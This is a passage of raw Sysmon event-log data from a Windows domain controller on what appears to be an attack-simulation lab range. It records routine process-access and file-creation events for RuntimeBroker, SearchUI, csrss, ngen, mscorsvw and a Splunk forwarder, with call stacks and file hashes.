indows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.766{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2F05-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.766{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2F05-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.766{4DB9351A-A271-60D3-2E05-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DKGUHXHONA\DfsObjectModel.ni.dll.auxMD5=FA7949190A14FAB61153663DEDE4C5DA,SHA256=86CCF1FA7B8ECFC815B87D924FAB94C22D28478F5E5BB4FC4DDE90863A377774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.766{4DB9351A-A271-60D3-2E05-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DKGUHXHONA\DfsObjectModel.ni.dllMD5=DEF8CB6A7A36D8772317F9D729669C4D,SHA256=4DAF826AAE2CD2D278A4CF2D71370FC8F1CE26587F5582CC5E3CC1236DF6E64A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.733{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.718{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x800000000000000022635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.686{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D41E1E0491E9335B6D9B99B487D45B07,SHA256=F399B8D6C8FF264337C6BEC13F3DD984DE31B06842145917ABD2AB2D3E0C95F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 